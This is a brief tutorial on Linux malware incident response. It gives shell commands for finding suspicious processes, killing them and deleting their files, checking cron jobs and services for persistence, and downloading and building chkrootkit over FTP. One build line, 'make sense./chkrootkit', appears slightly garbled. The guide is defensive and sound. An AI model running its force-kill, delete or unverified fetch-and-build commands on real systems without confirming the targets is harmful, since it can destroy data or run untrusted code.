Master Linux Incident Response: Step-by-Step Virus Detection and Removal

Linux incident response is more challenging than Windows because it lacks tools like Autorun and Process Explorer and a unified workflow.

This article explains a four‑stage response process for Linux infections and provides the shell commands used at each stage.

1. Identify Symptoms

Start by examining system performance and security alerts to spot suspicious behavior.

Check CPU usage

List processes sorted by CPU usage: top Processes with >70% CPU and suspicious names are likely mining malware.

Detect suspicious processes

Show full command lines: ps -aux Look for unusual strings such as URLs that indicate a downloader.

Security gateway alerts

Identify processes communicating with C&C servers: while true; do netstat -antp | grep [ip]; done If the malicious host uses a domain name, add a fake entry to /etc/hosts and monitor that IP.

Check command history

Search for previously executed malicious commands:

history

2. Remove the Virus

Use information gathered in the identification stage to terminate the malicious process and delete its files.

Kill the process ps -elf | grep [pid] && kill -9 [pid] Delete the executable

ls -al /proc/[pid]/exe && rm -f [exe_path]

3. Close the Loop (Containment)

Linux persistence mechanisms are fewer than Windows but include scheduled tasks, services, hijacked binaries, daemon processes, and malicious drivers.

Check cron jobs

crontab -l

cat /etc/anacrontab

Inspect services service --status-all Search for hijacked system files

find /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ -type f -mtime -7 -exec ls -la {} \;

Detect malicious daemons lsof -p [pid] Scan for rogue drivers lsmod Optionally run chkrootkit after installing it:

wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
 tar zxvf chkrootkit.tar.gz
 cd chkrootkit-0.52
 make sense./chkrootkit

4. Harden the System

Apply patches for common web vulnerabilities (e.g., Struts2 RCE, ThinkPHP, Redis, Confluence, Drupal) and enforce strong passwords to reduce future infection risk.

Linux malware mainly consists of botnet worms and cryptominers; because Linux servers are often exposed to the internet, unpatched web applications are frequent entry points.